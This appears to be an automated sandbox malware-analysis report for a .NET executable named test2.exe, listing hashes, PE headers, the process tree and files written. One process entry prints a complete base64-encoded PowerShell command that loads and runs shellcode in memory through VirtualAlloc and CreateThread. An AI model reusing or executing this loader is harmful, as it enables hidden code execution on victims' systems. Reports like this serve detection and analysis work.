File name: | test2.exe |
---|---|
Full analysis: | https://app.any.run/tasks/81581640-7f2b-4bd6-a0b9-567ab21903a0 |
Verdict: | Malicious activity |
Analysis date: | April 14, 2019, 19:22:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 6A92E1520791F538BD68350CA9C64A76 |
SHA1: | 3CCFF9937BFA297B1534A6B34B397CEE8FE1DBF4 |
SHA256: | 5CB6C987F9E8C9862B94F266BBF4B39D1C281B682B670B2B7A521795B351BF46 |
SSDEEP: | 384:BwAXXwpskBwiRYj8ccCi6ah7YgPwWSwmcFJB71y:BXXXKHBxRYj8cEYgPwW2cFJB71y |
Extension | Identification (%) |
---|---|
.exe | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
.dll | Win32 Dynamic Link Library (generic) (7.4) |
.exe | Win32 Executable (generic) (5.1) |
.exe | Generic Win/DOS Executable (2.2) |
.exe | DOS Executable Generic (2.2) |
ProductVersion: | |
---|---|
ProductName: | |
OriginalFileName: | test2.exe |
LegalTrademarks: | |
LegalCopyright: | |
InternalName: | test2 |
FileVersion: | 0.0.0.0 |
FileDescription: | |
CompanyName: | |
Comments: | |
CharacterSet: | Unicode |
LanguageCode: | Invariant |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 0.0.0.0 |
FileVersionNumber: | 0.0.0.0 |
Subsystem: | Windows command line |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x59ae |
UninitializedDataSize: | - |
InitializedDataSize: | 1536 |
CodeSize: | 14848 |
LinkerVersion: | 8 |
PEType: | PE32 |
TimeStamp: | 0000:00:00 00:00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_CUI |
Compilation Date: | 01-Jan-1970 00:00:00 |
Comments: | - |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 0.0.0.0 |
InternalName: | test2 |
LegalCopyright: | - |
LegalTrademarks: | - |
OriginalFilename: | test2.exe |
ProductName: | - |
ProductVersion: | - |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 01-Jan-1970 00:00:00 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x000039B4 | 0x00003A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 3.08882 |
.rsrc | 0x00006000 | 0x000002D8 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.3252 |
.reloc | 0x00008000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0815394 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.19604 | 640 | UNKNOWN | UNKNOWN | RT_VERSION |
Imports |
---|
mscoree.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2664 | "C:\Users\admin\AppData\Local\Temp\test2.exe" | C:\Users\admin\AppData\Local\Temp\test2.exe | — | explorer.exe |
User: admin Company: Integrity Level: MEDIUM Description: Version: 0.0.0.0 | ||||
2236 | C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand [encoded command omitted] | C:\Windows\system32\cmd.exe | — | test2.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2320 | powershell -window hidden -EncodedCommand [encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2916 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABCAFoAbwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEIAWgBvACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAZQAsADAAeAAwADEALAAwAHgAOQAzACwAMAB4ADYAMwAsADAAeAA3ADAALAAwAHgANQBhACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAyACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZgA0ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgAZgAyACwAMAB4AGYANgAsADAAeAA4AGYALAAwAHgANABjACwAMAB4ADkAMwAsADAAeAA3AGYA
LAAwAHgANgBhACwAMAB4ADcAZAAsADAAeAA5ADMALAAwAHgAMQBiACwAMAB4AGYAZQAsADAAeAAyAGUALAAwAHgAMgAzACwAMAB4ADYAOAAsADAAeAA1ADIALAAwAHgAYwAzACwAMAB4AGMAOAAsADAAeAAzAGMALAAwAHgANAA3ACwAMAB4ADUAMAAsADAAeABiAGMALAAwAHgAZQA4ACwAMAB4ADYAOAAsADAAeABkADEALAAwAHgAMABiACwAMAB4AGMAZQAsADAAeAA0ADcALAAwAHgAZQAyACwAMAB4ADIAMAAsADAAeAAzADIALAAwAHgAYwA5ACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA2ACwAMAB4ADIAOQAsADAAeAA1ADgALAAwAHgAZgA0ACwAMAB4ADcAYgAsADAAeAAyADgALAAwAHgAOQBkACwAMAB4AGUAOQAsADAAeAA3ADEALAAwAHgANwA4ACwAMAB4ADcANgAsADAAeAA2ADUALAAwAHgAMgA3ACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAMwAzACwAMAB4AGYAYgAsADAAeAAwADYALAAwAHgANABmACwAMAB4AGQANQAsADAAeAA3AGIALAAwAHgAZgBhACwAMAB4ADEAOAAsADAAeABkADQALAAwAHgAYQBhACwAMAB4AGEAZAAsADAAeAAxADMALAAwAHgAOABmACwAMAB4ADYAYwAsADAAeAA0AGYALAAwAHgAZgA3ACwAMAB4AGIAYgAsADAAeAAyADUALAAwAHgANQA3ACwAMAB4ADEANAAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4AGUAYwAsADAAeABlAGUALAAwAHgANwBkACwAMAB4AGYAZgAsADAAeAAyADQALAAwAHgAMwBmACwAMAB4ADcAZAAsADAAeAA1ADMALAAwAHgAMAA5ACwAMAB4ADgAZgAsADAAeAA4AGMALAAwAHgAYQBhACwAMAB4ADQAZAAsADAAeAAyADgALAAwAHgANgBmACwAMAB4AGQAOQAsADAAeABhADcALAAwAHgANABhACwAMAB4ADEAMgAsADAAeABkADkALAAwAHgANwAzACwAMAB4ADMAMAAsADAAeABjADgALAAwAHgANgBjACwAMAB4ADYAMAAsADAAeAA5ADIALAAwAHgAOQBiACwAMAB4AGQANgAsADAAeAA0AGMALAAwAHgAMgAyACwAMAB4ADQAZgAsADAAeAA4ADAALAAwAHgAMAA3ACwAMAB4ADIAOAAsADAAeAAyADQALAAwAHgAYwA3ACwAMAB4ADQAMAAsADAAeAAyAGQALAAwAHgAYgBiACwAMAB4ADAANAAsADAAeABmAGIALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4AGQAOAAsADAAeAAwADIALAAwAHgAOABmACwAMAB4AGUAOAAsADAAeAA4ADAALAAwAHgAZAAxACwAMAB4AGEAZQAsADAAeABhADkALAAwAHgANgBjACwAMAB4AGIANwAsADAAeABjAGYALAAwAHgAYQBhACwAMAB4AGMAZQAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4AGEAMAAsADAAeABlADMALAAwAHgANwBkACwAMAB4ADAANAAsADAAeABlAGIALAAwAHgANgBiACwAMAB4AGIAMQAsADAAeAAyADQALAAwAHgAMQA0ACwAMAB4ADYAYwAsADAAeABkAGQALAAwAHgAMwBmACwAMAB4ADYANwAsADAAeAA1AGUALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABlAGYALAAwAHgAZAAyACwAMAB4ADAAYgAsADAAeAAzADUALAAwAHgAZgA3ACwAMAB4ADYAMwAsADAAeAAxAGIALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeABjAGIA
LAAwAHgANABjACwAMAB4ADMAOQAsADAAeABjADgALAAwAHgAMgBjACwAMAB4ADQANAAsADAAeABmAGQALAAwAHgAOQBjACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAZAA0ACwAMAB4ADkAYwAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGQAOQAsADAAeAA0ADgALAAwAHgAOAAyACwAMAB4AGYANAAsADAAeAA0AGQALAAwAHgAYgAzACwAMAB4AGYAYgAsADAAeAAwADkALAAwAHgAYwBlACwAMAB4ADUAYgAsADAAeABmAGUALAAwAHgAMAA5ACwAMAB4AGQANwAsADAAeAA1ADUALAAwAHgANwA3ACwAMAB4AGUAZgAsADAAeAA4ADcALAAwAHgAMwA5ACwAMAB4AGQAOAAsADAAeABhADAALAAwAHgANgA3ACwAMAB4AGUAYQAsADAAeAA5ADgALAAwAHgAMQAwACwAMAB4ADAAZgAsADAAeABlADAALAAwAHgAMQA2ACwAMAB4ADQAZQAsADAAeAAyAGYALAAwAHgAMABiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgAYwA1ACwAMAB4AGUANAAsADAAeABhADgALAAwAHgANQAwACwAMAB4ADcAMQAsADAAeAA5AGMALAAwAHgAZgAwACwAMAB4ADIAYgAsADAAeABlADAALAAwAHgANgAxACwAMAB4ADIAZgAsADAAeAA1ADYALAAwAHgAMgAyACwAMAB4AGUAOQAsADAAeABkAGMALAAwAHgAYQA2ACwAMAB4AGUAYwAsADAAeAAxAGEALAAwAHgAYQA4ACwAMAB4AGIANAAsADAAeAA5ADgALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeABlADcALAAwAHgAMABlACwAMAB4AGYANAAsADAAeABkAGQALAAwAHgAOAAyACwAMAB4AGEAZQAsADAAeAA2ADAALAAwAHgAZABhACwAMAB4ADAANAAsADAAeABmADkALAAwAHgAMQBjACwAMAB4AGUAMAAsADAAeAA3ADEALAAwAHgAYwBkACwAMAB4ADgAMgAsADAAeAAxAGIALAAwAHgANQA0ACwAMAB4ADQANgAsADAAeAAwAGEALAAwAHgAOABlACwAMAB4ADEANwAsADAAeAAzADAALAAwAHgANwAzACwAMAB4ADUAZQAsADAAeAA5ADgALAAwAHgAYwAwACwAMAB4ADIANQAsADAAeAAzADQALAAwAHgAOQA4ACwAMAB4AGEAOAAsADAAeAA5ADEALAAwAHgANgBjACwAMAB4AGMAYgAsADAAeABjAGQALAAwAHgAZABkACwAMAB4AGIAOAAsADAAeAA3AGYALAAwAHgANQBlACwAMAB4ADQAOAAsADAAeAA0ADMALAAwAHgAZAA2ACwAMAB4ADMAMwAsADAAeABkAGIALAAwAHgAMgBiACwAMAB4AGQANAAsADAAeAA2AGEALAAwAHgAMgBiACwAMAB4AGYANAAsADAAeAAyADcALAAwAHgANQA5ACwAMAB4AGEAZAAsADAAeABjADgALAAwAHgAZgAxACwAMAB4AGEANwAsADAAeABkAGIALAAwAHgAMgAwACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASgBYAEEASAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEA
KQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASgBYAEEASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBYAEEASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |  | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1924 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\on7njtwb.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe |  | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
4060 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES68B0.tmp" "c:\Users\admin\AppData\Local\Temp\CSC68AF.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2320 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTRKUQNZQU9FLGJQLOQ5.temp | — | |
MD5:— | SHA256:— | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9OBHQLRKUSRGZX98WAAZ.temp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC68AF.tmp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.pdb | — | |
MD5:— | SHA256:— | |||
4060 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES68B0.tmp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.dll | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.out | — | |
MD5:— | SHA256:— | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106582.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2320 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106311.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |